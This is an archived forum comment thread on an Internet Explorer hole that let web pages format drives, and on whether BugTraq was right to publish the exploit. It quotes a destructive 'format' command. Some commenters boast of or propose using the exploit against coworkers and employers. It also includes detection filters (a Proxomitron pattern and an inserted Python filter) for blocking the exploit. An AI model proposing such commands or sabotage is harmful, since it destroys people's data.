Surely there's a typo here. If I discover that the computer I'm working on has Windows installed, you're saying that all I need to do to reformat the hard drive is click on one of these web sites?
MS's software is bloated and security-hole-ridden - we all know that. I've seen a couple posts about people 'losing important data' .. how about don't use IE? Seems simple enough. Between Mozilla, Opera, & Nutscrape there are plenty of functional alternatives.
When channel x news sneeks a weapon through airport security and alerts the airport. Then a month later does the same thing, should they alert the public to make them aware of the danger?
If you are right, this changes the entire scope of this article. If MS said uh-uh, then let them have it.
Why, o why must the sky fall when I've learned to fly?
This way the vendor knows the clock is ticking, and once you've published the puzzle and the encrypted exploit no amount of legal maneuvering can put the cat back in the bag, so to speak. Basically, it allows you to put pressure on the vendor while still being responsible and giving the vendor a month (for instance) head start. You can put decent bounds on how long it will take the fastest consumer machines to solve the puzzle. There's currently a puzzle running that's supposed to get completed shortly before the MIT Laboratory for Computer Science's 70th b-day, for instance.
Copyright Violation:"theft, piracy"::Anti-Trust Violation:"thermonuclear price terrorism"<-Overly dramatic language.
Great. You've now thrown up a speedbump.
[h4x0r] dude! u see that sploit on bugtraq?
[z3r0c001] yea but its broken
[h4x0r] i no but i talked 2 m4sterbl4ster, he is l33t and fixed it
[h4x0r] u want a copy
[z3r0c001] yea!!!!
Not all punks are scriptkiddies.
Secondly, much of an issue is something only the vendor can do. And the vendors have historically shown that they will not address security issues unless sufficiently motivated. Vendors are businesses. And customer demand is the motivation vendors best understand.
Unfortunately, customer demand is only created by sufficiently demonstrating a problem. It's one thing to claim something exists. It's entirely different to DEMONSTRATE that it exists. The dirty little non-secret is that such demonstrations ultimately involve considerable pain to the very people who would be saved.
And that is where the main message is being lost. Yes, the public is realizing that there are some serious security problems out there. But instead of demanding better products, they blame the messenger. Instead of asking "why is my email client so insecure", the question asked is "why do people write viruses?"
The emperor has no clothes. And instead of dealing with the issue at hand, we have "experts" demanding that those who are posting notices about this situation to the public stop. As if the situation would improve if everyone just ignored it. Perhaps fewer people would see the naked emperor if they stopped looking. It would make the tailors' union happy. And it would probably please those who publish and sell expensive books on the subject. But it does nothing for the public, nor ultimately the emperor him/itself.
I think the word "kiddie" in "script kiddie" belies some of the risks.
I'm betting that most of your "script kiddies" are 30-something, college-educated folks, who have not insignificant amounts of IT experience. Sure there are 13 year olds out there too, but "script kiddie" imparts a certain bias that may bring with it complacency.
They are just beta testing their new DRM!
If you don't prove it, they will deny it. The ability to erase everything is the threat that all root exploits pose. It's about time the popular press understood the implications. God knows, M$ spends enough money denying the ability and on astroturfing where people who suggest such things belong to the tin foil hat camp.
I hope this blows all the way up to and beyond CNN. I'm tired of people looking at me like I'm cross-eyed when I tell them that IE is full of holes that allow others to look at your files and erase them. M$ can't buy the entire mass media forever.
Friends don't help friends install M$ junk.
Umm... I think the cracker community has their own system of karma, in the form of reputations. The guy who fixes the exploits for the kiddies gets massive amounts of karma. There are plenty of smart people willing to fix the exploits for the kiddies; if nothing else, it raises the "noise floor" for hunting down the skilled crackers. Posting broken exploits isn't security through obscurity, it's security through denial.
The Wired talks more about bugtrack's handling of the whole thing, and how it essentially posted working code for the exploit. Was it irresponsible or not?
What's irresponsible is living in a fantasy world and thinking that Bugtraq are the only ones capable of exploiting a bug like that. Just because you don't talk about it and shh shh it doesn't make the bug disappear and unexploitable. Shit man just like any exploit someone is gonna write code to exploit it if it's in their interest or for fun or just because they are pure evil. With something like this; shit as soon as the exploit was posted I'm sure there were people writing code to exploit the shit.
Even if that were true, it would not have worked. How long does it take someone to fix the trivial error and post it back? Months? I think not.
I'd be willing to bet 95% of the break-ins on the internet are plain old script kiddies.
Here you are right, and M$ plays right into it. The whole closed software world encourages people to not understand what's going on inside their computer, and makes it impossible to secure even if you do have the skills and time. Worse, with M$'s planned obsolescence practices we all know that the average M$ box is built and rebuilt all the time from ancient "unpatched" CDs. Just ask this obviously self moderated loudmouth for example. So there you have it, a world full of broken and unfixable machines all serving a single company's bottom line at the expense of their owners and the rest of the world.
Friends don't help friends install M$ junk.
"And, yes, it would be different if this were Linux, or BSD, or even MacOS. All those operating systems come with companies or communities who take security seriously, and they respect their users enough to not foist insecure features on them."
Really?
Show me the security bulletin on Redhat's website for the issues found in KDE last August.
The sad fact is the Linux support community is even worse than Microsoft. They don't even acknowledge problems even after they've been patched by the development team. Maybe it's just a lack of communication mechanisms, but whatever it is it is bizarre.
Honestly, never was so much fuss made about a pointless feature that should just be disabled and forgotten about.
Jon.
Then again, do you really think script kiddies really care what you and I think? No software is perfect, and all software will contain bugs. This is why there's QA and iterative development. The real solution here isn't to place blame, which American culture loves. The real solution is to make sure software is designed and built to a high standard. Everything after the fact is simply rationalizations and poor attempts to deflect responsibility.
A whole new mechanism to remove yourself from spam!
Note also that it's been 6 weeks since he contacted Microsoft and basically got a one-fingered salute. This is similar enough to other problems with IE in the past that it's not too far fetched to assume the black hats already know about it. Microsoft needed the only kind of wake up call they respond to -- a public relations stink.
Exactly what constitutes a security hole?
The current issue, to me, appears to not be so much a bug as it is leaving the back door unlocked. The article describes how the user can disable scripting, etc. Once you do that, it's no longer a problem. Once you lock the back door, the bad guys can't get in.
Security ultimately lies in the hands of the end user, whose responsibility it is to to know what each of the options are and what the impacts are of them. If checking a box makes your system more secure, then that's the user's responsibility, not the vendor's. The vendor has a responsibility to inform the user of the impact of various security settings, and to define a set of default settings that result in a secure system. If there is a vulnerability that can't be resolved by a checkbox, then it becomes the vendor's responsibility to issue a bug fix.
As a layman, I don't see it as anything that Microsoft can resolve, except a "patch" that changes the security settings. If it is indeed a flaw, then it should be exploitable with the appropriate security settings enabled. (I don't have a deep understanding of scripting in IE, so perhaps there is a flaw that I'm not seeing.)
I see a responsibility of users to inform other users of security lapses and inform them of an appropriate course of action. That is what the article mentioned in the parent post does. There is also a responsibilty to not disparage the software vendor unless it is a legitimate bug, that bug results (or could result) in a compromised system, AND the vendor refuses to acknowledge it or issue a patch for it in a timely manner. It is irresponsible to provide the public with details or code describing specifically how to exploit the flaw.
Give me my freedom, and I'll take care of my own security, thank you.
faggotfuck.com? Does not exist. You fail it. P.S. Happy Troll Tuesday.
Step 1:- Troll Step 2:- Step 3:- Profit!
So it formats your drive when you use IE.
Isn't that good? Stop whining about it.
that when I read this I was in my C++ class and I actually was laughing out loud for about 5 minutes. I stated that "Microsoft sure does suck." Not that I hate all microsoft stuff (XP = god-like). But, in this instance they sure do suck. Then I just thought about how lucky I am that Mozilla exists.
SIGFAULT
I just modified the script and was able to format a floppy disk on a co-workers machine. I was able to pipe the \n character into it to get it to start automatically. It is very simple to replace a: with c:. Good luck to all you windows users, you're going to need it now.
My point is, the cracker community doesn't need bugtraq to even find these exploits. If you follow my reasoning (that possibly 95% of hacks are script kiddies who just run pre-compiled apps), by not providing these working exploits on a popular security site you could decrease attacks dramatically.
Think gun safety. I'm not saying you can't have a gun. I'm not saying you can't use a gun. I'm saying I'm not going to give you a gun that's loaded, with the safety off.
"I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatantly stolen sig)
I'm working to see just what it will take to make this script install linux
Actually, I meant IE for Mac, not for Windows (Note that I said IE Mac is better than IE Windows). Remember that in choosing a browser, I mainly care about features that I actually use.
Although it's nice, I don't care too much about popup blocking, I usually can close them before they go under or start spawning. Of course, it may help that I don't spend my days at porno sites, where this could be a bigger issue. Tabbed browsing is also cool, but only marginally more efficient than lots of stacked windows. Standards support is not much of an issue, as most pages are written and tested for MSIE's faulty implementation of the standards anyway. On Mac, IE has much better plugin support than Mozilla, and more importantly, integrates better with Aqua so as to perform faster (for stuff like window resizes) and looks better. Furthermore, if you want to talk standards compilance, IE conforms better to Apple's interface guidelines than Mozilla by quite a bit.
Then there's Chimera, which is sort of the Mac equivalent of Phoenix. The main advantages of Chimera (over Mozilla) are that it loads faster and runs faster/with less memory, and that the features of Mozilla that it preserves happen to coincide with the ones I use (tabbed browsing and popup blocking). Its interface is a bit nicer. Furthermore, it is a Cocoa app, which means better system integration and that I can use Cocoa gestures. I am writing this post from Chimera. But it still runs slow, violates various interface guidelines (e.g. keeping related interface elements in the same font, size, style), crashes more often than Explorer, and lacks many of the features that I do use (selection-completion, for example). It also has poor plugin support. Chimera is only version 0.6, so we can expect this to improve later, and it is already the second-best Mac browser I've tried.
I've only tried Opera briefly, but the free version seems no better than Chimera. It doesn't block banners, just replaces them with its own. It runs slower than Chimera, is buggy, and is a Carbon app (not Cocoa). It seems to have lots of features, but I started by turning most of them off anyway. And it's adware, which is annoying.
Overall, although there are several features I'd like to see in Explorer, it is the best that is available for what I do on the web. After that, Chimera is the best, and should get better.
I hereby place the above post in the public domain.
well i got to the end, no real surprises, except whenever java is mentioned out crawls the ms worm - i know im going to get flamed but i work for ms and listen java isnt healthy, bla, bla, microsoft loves you, bla, bla
where are you worm, defend yourself now, well you can't, but show yourself and talk some crap
i love you
i love my win 98
i love bills cheesy schlong
i will make you richer baby
please dont kill the internet
god help Microsoft if someone managed to get this code on windowsupdate or even *shudder* this site.
Then it doesn't matter at all what Bugtraq does. However, you think this means they shouldn't publish exploits. Your logic is all backwards.
If it doesn't matter what BugTraq publishes, then BugTraq should publish exploits ported to as many programming languages and platforms as possible, for educational enlightenment.
IE bugs can format a hdd now. What's next? A bug that will literally kill you in your chair.
:)
Actually, that might make msgboard moderation a lot easier. Die, troll!
It's perfectly fair to post full source code for the exploit. If I discovered it, I would sure disclose as much as I could; that's how you get known in the security business. Disclosing holes in detail is how you build a reputation. It demonstrates that you understand the flaw in great detail. This is Microsoft's problem: it's their software that has a hole in it, and Microsoft is responsible for all damage caused by this hole. Just like Linus can't blame somebody for disclosing a hole in Linux.
"Showing people how to automatically format hard disks from a Web page isn't 'full disclosure,'" Smith said. "It is malicious code writing. To an outsider, Symantec's actions give the impression that they are encouraging people to create and release malicious code."
Yeah, and reading Mein Kampf will make me a nazi.
Reading about guns will make an assassin.
Reading Kama Sutra will make me a Don Juan.
Reading Juan Manuel Fangio's biography will make me a F1 racer.
But not reading any of these will make me dumb.
Difficult choice, isn't it?
it became available over SIX months after the exploit was widely used by haxor/scripto-kiddies... Is it more significant that it took microsoft six months from that time to fix the problem, or that it took two weeks from the time it was used to down microsoft.com websites running on (then unhackable (HA!) NT)
Does this have any relevance? If someone somehow turns the bug on MS they patch it; otherwise it is deemed to be a non-issue.
Anyhow...
Does anyone know of any MS webservers that are lacking in the patch department, so that MS might further the distribution of this exploit?
(I bet a dollar that it would be fixed then!)
-AC
Ugh. This is so f???ing unbelievable. It's just so incredible that I have decided for my own needs -- yes, my opinion and not intended to be construed as defamation of MS's character -- that all these IE exploits will remain unfixed because of the world domination megalomania that is MS. At a snap of their fingers, if things don't go their way, they could just pull the plug, thereby f???ing up the rest of the world. No one has stopped them and I am convinced no one can.
First of all, stay away from MS products.. Check!
Second, don't visit unknown links... Check!
Third, Disable pop-ups, block what can be blocked in the browser. Check!
Fourth, upgrade your OS with the latest patches and fixes, (Gentoo here, emerge -u world)... Check!
Fifth, implement a nazi firewall... Check!
Looks good so far, have never had an attack or lost data due to a security hole. I can sleep in peace.
If you mod me down, I *will* introduce you to my sister!
It seems posting malicious code is a lot like providing links to pre-release code for a certain upcoming game.
Slashdot comments can be accurate, highly modded, or posted quickly. Pick two.
Now let's give everyone working guns so we can force someone to come out with a fix for this exploit.
Ok, here's my take on this. I know it's probably been said a hundred times already and/or I'm gonna get ripped up, but here goes the proverbial toe in the water of this debate for me:
1) If you're using IE you should realize that you are lucky if a day goes by and your system is not formatted or taken over by script kiddies.
2) M$ probably will not issue a patch in a timely manner anyways, whether or not they are notified and the exploit code is released.
3) The code will get around the internet anyways, with or without Bugtraq. Script kiddies will get it from other public forums.
4) Most importantly (and perhaps up for debate): Having access to exploit code allows people to play around with security fixes until they can solve the problem themselves. Sure, you can just look at the fixes posted by the people who find the exploits, but it's better to tinker and try to solve the problem yourself and learn. The code itself isn't intrinsically bad, it's the intent of the people with it. It's like gun control in America (ok, trying to hold top on can of worms now). Personally I don't think we should restrict access to exploit code (or guns for that matter...DAMMIT WORMS GET BACK IN THERE!!!) because people could do bad things with it. Those people will get their hands on the code anyways, or just go find new ways of doing bad things because that's what bad people do.
"But that's just my opinion, I could be wrong" - Dennis Miller
No more clogging of the Apache error logs looking for default.ida, default.ida will now exist with a javascript. Of course I'm not mean enough to delete their harddrive but they might wonder why they left open a command window saying their computer is infected with Code Red.
Seriously, why can't people put this in perspective? After all, it's just another MS bashing session.
:-). Their data should be stored on a server somewhere, and their mail will be safe.
A bug like this may affect home users - all they need to do is reload Windows and restore their data - CD-ROM burners are cheap, and it's not too much to get a copy of Ghost to snapshot a computer.
In a corporate environment, if people kill their desktop computer, you just reload off a standard image (Ghost again
If people have a REAL problem, then maybe they should simply switch web browsers. IE is a de facto standard, but if you kill the icon and load up Netscape or Mozilla you avoid the problem. If you're really serious, build a Unix/Linux host somewhere on your LAN, load up Opera, and give everyone an X terminal emulator to run it remotely.
Bugs like this should be posted ASAP. Companies like Microsoft have wads of cash - instead of flushing it away on EAL4 Certification of defunct products, they need their priorities realigned to deal with this kind of threat.
If you have a problem with IE 'security' write to your local Microsoft office. Write to your congresscritter, complaining about this threat to national security and Microsofts irresponsible attitude to their customers.
Keeping quiet about this kind of hole simply slows down the release of fixes. This adversely affects those who run a tight ship, and accommodates those who slack off - totally the wrong way around.
If defects like this cost some IT weenie their job, it's not a problem, it's an opportunity for improvement.
With all the exploits I keep hearing about in IE, it makes me so glad that in Windows I have started using Mozilla more than IE. Yes, I still use Windows, but I am slowly moving over to Linux.
I fail to see how this is controversial in the least. It is just another bug found in a piece of software full of bugs. The guy reporting it gave Microsoft a full month before he went public, that should have been more than enough time to build a patch.
As for the exploit itself, what's wrong with the code he wrote? If it scares the PHBs into actually demanding a more secure IE from MS then all the better.
The suggested payload should have been something that broke IE. Those vulnerable would have done themselves a favor, and the network admins would get a good excuse to spread an alternative like mozilla or opera.
Stop the brainwash
Just wait until someone writes their fun exploit code to set up a DDoS at your company then makes it the yahoo.com home page. There is more to Internet security than covering your own a$$; helping to keep the average user safe should be a concern for all.
In fact, there were a few machines for which we did not have root password and we used the exploit to patch the machine (closing the hole behind us).
Having a very visible exploit definitely helps NOT only the vendor, but the reluctant administrator!
Quality only comes through the finding (exploiting) of bugs. Covering up problems is not the answer. Ignoring problems for which there are no known exploits is also not the answer.
No worries, I'll just pop over to windowsupdate.microsoft.com and get the latest bug fixes. Oh, what's this? The new v4 Windows Update for Win98 crashes Internet Exploder 6 SP1 on both my Win98 PC at home and my Win98SE PC at work.
Ooo, I love Fallacity. Fallacity two was the one where she first met Ben, right?
So does Windows XP, and look at all the good press that's gotten Microsoft.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
Post your IP address and the version of Windows you are running. When your system is destroyed, you can write the article you just described.
I know as a software developer myself, if someone were to contact me with a recipe for a defect I didn't think existed with a "I made sure these steps wouldn't really work, just change it until it does", I probably would not put much effort into investigating. And I'm willing to bet this exploit didn't make it to very many programmers within Microsoft.
And how, exactly, do you know when you're running "trusted code"? For years, security experts recited the mantra that you couldn't get an e-mail virus just from reading your mail, and you had to actually run an attachment to get infected. Then MS screwed up with the scripting in things like Outlook (Express), and suddenly all the non-techies in the world, trusting their techie colleagues about the virus thing, are getting caught. Whose fault is this? I sure as hell don't want or expect to run any code automatically just because it's part of an e-mail I'm reading, but MS left me no choice if I use that product, and of course many have no choice about that, either.
No, I think bitching about scripting and APIs that let code run on my box when I neither want nor expect it to is quite justified, thanks very much.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
The fix is located here and here. I've already "patched"...
It's quite indifferent really; if you choose to do something bad with it, that's irresponsible, and possibly illegal. I like running exploit code on my machine, or on a client's machine, because sometimes explaining the vulnerability to them doesn't stress its importance (it's just gibberish). I'm pretty sure exploit code wouldn't be of use to a savvy sysadmin with a debugger, disassembler, and a hex editor... oh wait, nm, I guess they could tweak their binaries in many cases to not be susceptible to the exploit (without necessarily eradicating the bug).
Certainly not /. But all this talk about script kiddies would make you think they are everywhere. IMHO most kiddies are playing video games, watching T.V., increasing world population, cultivating herbs, etc. etc. Where the hell are all the kiddies so eager/informed enough to run malicious scripts from a fixed IP or hack a current website and insert the canned code? I personally don't think the so-called script kiddies are that dumb. Just like the PSAs say: if you smoke pot you'll get grounded, and if you create malicious viruses you won't get to smoke pot.
The truth suffers more from convictions than from lies.
Dear World,
Why is my browser even capable of formatting a hard disk? A browser has no practical need for system level capabilities like this.
Later,
Slashdot Junky
.
Landfill Mining Co.
Managing the (Un)natural Resources of Tomorrow
That seems way over the odds to me. I've spent the last couple of weeks fixing several bugs in a product within about 24-48 hours, when all that was at stake was a business deadline. When I couldn't find the bug myself, I called on other members of the team to help out, but in all cases, we had a satisfactory solution well inside a week, and usually the same day.
Security flaws are usually caused by careless errors that could easily be prevented. They can often be fixed in a few minutes once identified, and tested shortly afterwards. Companies who provide widely used critical software like operating systems or communications tools really shouldn't have a problem getting things turned around within 24 hours. If they do, either their code is so screwed up that it's totally unsuitable for use in a potentially vulnerable environment (granted, Microsoft have actually made exactly this claim about several versions of Windows in recent months) or they seriously need to reconsider how they run their response to security vulnerabilities that are reported.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
As I suggested in the July thread on the acquisition topic, Symantec scooped up SecurityFocus as a means to put the brakes on the full disclosure movement.
This exploit is so severe it will no doubt cause the clueless masses to clamor in fear and demonize the full disclosure movement. It would not surprise me in the least if lobbyists for the likes of Microsoft leverage this news event to spin the next pro-Microsoft bill through the legislature.
By this time, the "top dogs" from the old SecurityFocus have no doubt been kerneled and firewalled by Symantec Jr. Exec's filtering their communication traffic both in and out, and managing their task lists. As soon as these guys realize their upcoming irrelevance in the brave new world that is now SecurityFocus, they will be presented with a choice: to a) burn through all the cash Symantec just handed them in litigation to regain control of the firm or b) pursue other interests, as long as none of those interests compete with Symantec, well at least for the next five years.
What a terrible brain drain for the security community.
I do not wish to minimize the efforts and contributions made by the founders of bugtraq...They were an essential catalyst to the full disclosure movement. Still, it is the community that brings life to the movement. IMO, it is time for the community to respond to this situation by establishing a new forum for full disclosure that is outside the influence of corporate interests.
I regret I have only my insight to contribute.
Erm... You have exactly that much control in Windows XP. If updates are available, you are invited to download them, at which point you can follow links to relevant descriptions, KB articles, or what have you. You can then opt to install (or not) on a selective basis. And it checks for updates automatically as well.
I'm sorry, but your post is nothing but pure, unadulterated FUD.
If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
What about people who pay for net access? A lot of those people don't use the auto update because they are on slow connections and it is costing them a lot of money to be on the net.
A lot of people still pay per minute to be connected to the Internet and using the auto update tool over a 56K modem can take quite a few minutes. Plus, if you have to reload for any reason, you have to go through the whole process again. The autoupdate solution doesn't give you the files with instructions, so you have to run up the phone bill twice.
Remove this key: "HKEY_CLASSES_ROOT\CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\Implemented Categories"
Disables the class's "safe for scripting" status.
Apparently it should never have been.
theBureaucrat
MS is recklessly endangering your computer and your data with their shoddy attention to security prior to release. I think BugTraq is doing us all a favor by pointing it out.
I've always used the analogy that running MS software is like deliberately driving a Ford Explorer with those Firestone tires on it.
Wow, given this kind of 'sploit, it would be pretty easy giving yourself a heart attack from laughing on your last day on the job. Just modify the company's intranet login page to perform this exploit (using somebody else's account of course) and be sure nobody sees you giggling like a lunatic. Charge a consulting fee if they beg-plead-demand that you come back and help.
Every new form of media has its own Requirimento
I would probably have to admit that the trend had already begun before Symantec bought SecurityFocus this past summer. But as someone who has been reading bugtraq and other similar lists daily for years I feel the vigor in the bugtraq community isn't quite there any more. Heh, time will tell.
There is a contingent of Blackhats that would agree that revealing exploit code is irresponsible. They are quite vocal against doing so. The reason is simple. They don't want the holes they exploit closed. The more noise they make the more assured I am that releasing proof of concept/exploit code is the right thing to do.
When the buffer overflow technique became common knowledge and discussion of it became mundane, the communities of programmers where this had happened greatly reduced the number of such bugs. The programmer communities where these bugs are still produced have little feedback/discussion, or are ones where young programmers have an arrogance that precludes them from learning from history/older programmers. (The latter observation explains why so many of the same errors keep getting made in software on a generational timespan.)
YMMV 8-)
I think, therefore, ken_i_m
Some people just can't upgrade. There are tons of people that have a computer without internet access. Are you retarded?
My policy is to give the developer first opportunity to allow them to acknowledge the bug. However, what happens if the developer fails to acknowledge the bug exists? It took CascadeSoft almost 4 months to patch a remote vulnerability I found in W3Mail and even then their fix contained a new hole. Whilst I'm quite happy to sit on a bug if the developer is doing the right thing, bad developers NEED to be named and shamed otherwise they'll never learn.
;>.
PS. I'm a nobody in the security world and CascadeSoft have since promised to treat security as a higher priority
Tim Brown
This sort of reminds me of the issues related to on-line cheating in games such as Quake, Counter-Strike, etc. When you find an exploit, should you keep quiet, or should you tell everyone about it?
Well, I found a few exploits in the early versions of CS (0.3, I think), and, "responsibly", I sent a message to its authors, detailing the problem and proposing a couple of solutions. I never even got a reply. A new version was released, and the exploit was still there. So I posted some (incomplete) information on the CS user forums. A new version was eventually released, and the exploits were still there. Eventually, websites started to post instructions on how to exploit those holes in the code, and cheating became generalised. Still it wasn't fixed. It wasn't until "cheat packs" (complete with InstallShield) became widely distributed that the CS team actually decided to work on the problem.
CS was free, though.
Microsoft has absolutely ludicrous profit margins, and that money comes from their clients. I think those clients are entitled to expect reasonably secure software and (failing that), at least a quick response to the problems. This problem has been known for some time and MS still hasn't fixed it. Something this serious needs to be dealt with quickly. If Microsoft won't do it, then the users should at least be given a chance to, by switching to a different browser, either temporarily or permanently.
You don't have to use IE. There are alternatives. The alternatives are free and they're available to anyone who uses IE.
But the only way to warn those users it through the media. And the media won't give this problem due coverage unless they understand how serious it is. And they won't understand how serious it is unless there are real exploits. And it should be made pretty clear to the media that this problem affects MSIE, not "computers" or "the internet".
The point is not to "punish Microsoft" (or IE users). The point is to make people realise that they are not safe while also showing them that they can be safe. Or at least a lot safer.
RMN
~~~
I don't know what kind of superhuman world you people are living in, but bugs are a thing with software; it's not preventable, ever. Human error will *ALWAYS* occur as long as there is a human involved, because, simply put, we are not perfect. This can be evidenced by the fact that both open and closed source software contain bugs. I'm sure Microsoft will have a hotfix out within a couple of days; in the meantime you're asking for trouble using MSIE. Security can't be completely up to the company providing the product, and that's what these warnings are for, you know. Now that you know a thief is in the area, you'd better be damn sure to lock the doors to your car and your house. All the door can do is provide the lock; it can't lock it for you (actually newer cars do, but you get the idea).
#1 Secured computing
#2 Skip #1
#3 ???
#4 PROFIT!!!
OR
"Secured Computing", where's the money in that?
I can't help thinking of that line in A Few Good Men where Nicholson's character says "All you did was weaken a country today. That's all you did."
This should be the goal of the Linux evangelists; that easy to install and enough of a Windows workalike that ordinary users don't notice/care when someone does that.
--
Benjamin Coates
this is the new goatse link: http://www.apple.com/switch/stories/gautamgodse.html
The best part is that he's impressed with iPhoto. It looks like iPhoto made one hell of a gaping impression.
THERE IS NO DATA. THERE IS O
You can't restrain information that doesn't want to be restrained. Has never worked, doesn't work, will never work. (Yes, you can delay it a little. But nothing more.)
What alternative does Symantec have? If they start rejecting exploits, someone else will start a forum where all exploits are allowed. I prefer to have all this information in a place where I can be sure that the relevant people read it.
Of course, posting an exploit without giving the vendor (whether that is MS or a free software project) sufficient time to prepare a patch would be irresponsible. But when someone else is committed to doing so, there is nothing you can do.
My point was that in the 20 some years the PC has been around, using one has become harder, not easier. We don't exist to serve the computer, it exists to serve us; we shouldn't have to spend hours configuring a system or debugging an installation. When it comes down to it, I shouldn't have to go searching for drivers, recompiling kernels, finagling with registries, etc... I should be able to turn on the machine and start using it.
So you had a good experience with RedHat. So have I. But how many more have given up after realizing that they lacked the expertise to partition their hard drive, or botched an installation because they installed the bootloader in the wrong place, or had incompatible hardware, etc...
Linux is not the solution, it's the problem. Windows is not the solution, either - it's the question (Where do I want to crash today...). The solution will be found when programmers come out of their collective holes and recognize that their users are not the computer experts that they are. The solution will come when computer scientists are able to differentiate between the way an OS could be designed, and the way it should be designed. As much as I like free software, I hate to say that I haven't seen anything original or creative come from it - most free software projects are simply copying an existing proprietary program. What needs to happen is that the open source community needs to step up to the plate and produce an OS that is easy to install and easy to use. And simple.
The society for a thought-free internet welcomes you.
CERIAS' Gene Spafford says overpowered, complex, general purpose machines that can do way more than people need are a big part of the problem.
Read the rest of this interview in which he discusses how increased, unnecessary complexity combined with a lack of users' understanding of security vulnerabilities and issues, and manufacturers' lack of interest in building in security can make systems more vulnerable to attacks.
Dude; That post should have a spoiler warning!
After 30 years working with computers, and 20 years in Software QA, I can give you a very good reason why NOT to immediately apply all software updates. It is virtually impossible (read that incredibly difficult and expensive) to write perfect software -- I've yet to see any personally. In my experience, it's all too painfully common for one bug fix to cause yet another bug to appear, whether it's by breaking something that used to work or by revealing a previously hidden bug.
I've worked at companies that ran through a whole gamut of acceptance tests before they upgraded users' systems to a new release of anything. Their business depended on having a known platform for their users. Think of training, help desk, and the like.
I'm NOT saying users should not upgrade, only that there is a good reason for some users to not immediately install every new fix that comes down the pipe.
I have heard this reasoning many times before and people are overreacting.
... i had never thought of that before!!! "
... it is amazing how we keep having this argument over and over again.
Did the journalists give the terrorists the idea to crash planes into the WTC? No they didn't. Did they give them the idea to hold a musical theatre hostage? Nope.
Let's face it, terrorists are much better at being terrorists than journalists are. It would be stupid to believe that Osama is watching CNN and says "small pox
I guess Bugtraq is a bit different because there are a bunch of script kiddies out there that may actually get their info from bugtraq. But still if it is on Bugtraq all the good hackers already know about it.
Security through obscurity is no security at all. Considering how all the places that require serious security, like banks etc., have believed in that principle for a while now
Imagine some big ass company like Woohoo, JCN, Bayarea Auctions, DreLL, or moon microsystems laying off n% of their web developers due to the slowing economy. So Bob, not the stable type (we all have worked with someone like Bob), gets all bent out of shape and decides that he has a grudge against his employer, and decides to embed the malicious code into all of the links of his company's website and reformat all of the visitors' hard drives (talk about some bad fucking PR)....
Paranoid? maybe but just thinking
In the end they will lay their freedom at our feet, and say to us, "Make us your slaves, but feed us." - Dostoevsky
http://www.proxomitron.org/ can be used to nuke the javascript before it even starts. I don't know how robust it is against this exploit but it stops the demo on Neohapsis
Just add this to the patterns section of the config file:
Name = "Detect new IE exploit"
Active = TRUE
Bounds = ""
Limit = 5000
Match = "*(showHelp \(|"
"880a6-d8ff-11cf-9377-00aa003b7a11)*"
Replace = "WARNING: MSIE exploit attempted"
The Proxomitron can also stop any type of pop-up as well.
P.S. I didn't come up with that filter, a guest on Computer Cops did.
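The Proxomitron filter quoted above has two triggers: a showHelp( call, or the CLSID fragment of the control that the registry comment elsewhere in this thread suggests removing. As an added example that is not from the post, from Proxomitron, or from Computer Cops, here is the same check applied to page content in Python, so a reader can see what such a filter does and does not catch. The sample pages, the placeholder argument to showHelp, and the function names are constructed for this example; the Limit handling approximates Proxomitron's behaviour rather than reproducing it.

```python
import re

# Triggers lifted from the filter's Match line: a showHelp( call or the
# CLSID fragment.  Case-insensitive, as Proxomitron matching is.
TRIGGER = re.compile(r"showHelp\s*\(|880a6-d8ff-11cf-9377-00aa003b7a11", re.IGNORECASE)
# A whole <script>...</script> element; used to drop the entire block that
# carries a trigger, mirroring the filter's leading and trailing '*'.
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
WARNING = "WARNING: MSIE exploit attempted"   # the filter's Replace text
LIMIT = 5000                                  # the filter's Limit = 5000


def find_triggers(html):
    """Return (offset, matched_text) for every trigger found in the page."""
    return [(m.start(), m.group(0)) for m in TRIGGER.finditer(html)]


def filter_page(html, limit=LIMIT):
    """Return (filtered_html, hit_count).

    A <script> block no longer than `limit` that contains a trigger is
    replaced whole by WARNING (approximating '*(...)*' with Limit).  Any
    trigger left over, e.g. inside an <object classid=...> tag or in a script
    block larger than `limit`, is replaced on its own.
    """
    hits = 0

    def replace_block(m):
        nonlocal hits
        block = m.group(0)
        if len(block) <= limit and TRIGGER.search(block):
            hits += 1
            return WARNING
        return block

    def replace_trigger(m):
        nonlocal hits
        hits += 1
        return WARNING

    out = SCRIPT_BLOCK.sub(replace_block, html)
    out = TRIGGER.sub(replace_trigger, out)
    return out, hits


# Constructed sample pages (not taken from any real site).
CLEAN_PAGE = (
    "<html><body><script>document.title = 'hello';</script>"
    "<p>Benign page</p></body></html>"
)
FLAGGED_PAGE = (
    "<html><body><p>Click here</p>"
    "<script>window.showHelp ('PLACEHOLDER');</script>"
    '<object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"></object>'
    "</body></html>"
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("flagged", FLAGGED_PAGE)):
        filtered, hits = filter_page(page)
        print(f"{name}: {hits} hit(s), triggers at {find_triggers(page)}")
        print(filtered)
```

Note that, like the original filter, this matches on text only: a page that builds the call or the CLSID string at runtime (string concatenation, escaping) slips past it, which is why the post's author says only that it "stops the demo" rather than the exploit in general. The oversized-block fallback keeps the script tags and replaces just the trigger text, so a page is never passed through untouched once a trigger is seen.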
Here's yet another one published, and here's David Ahmad's response in light of these recent discussions.
What I don't understand in this whole mess: when I hear "execute arbitrary code", I know something's horribly broken. Why is it worse if someone exemplifies "arbitrary code" with "format a: /autotest" (in the ZDnet forum, reposted to BugTraq here) instead of
"winmine" (as in Sandblad's original advisory)? The important bit is "arbitrary code", no?
So what happens when I come along with a Field Programmable Gate Array and solve the problem 100 times faster than you expected?
I think the argument that open source implies better security is overrated. While it is possible for anyone to check the source code, almost no-one actually has the technical expertise, time and inclination to do so. Everyone else just trusts that other people will do so, which makes them every bit as vulnerable as those who installed a closed source system in the first place. The same goes for creating and distributing a patch: even in the Linux world, a high proportion of the development work in this area is actually done by the big distro vendors, not by the OSS community as a whole.
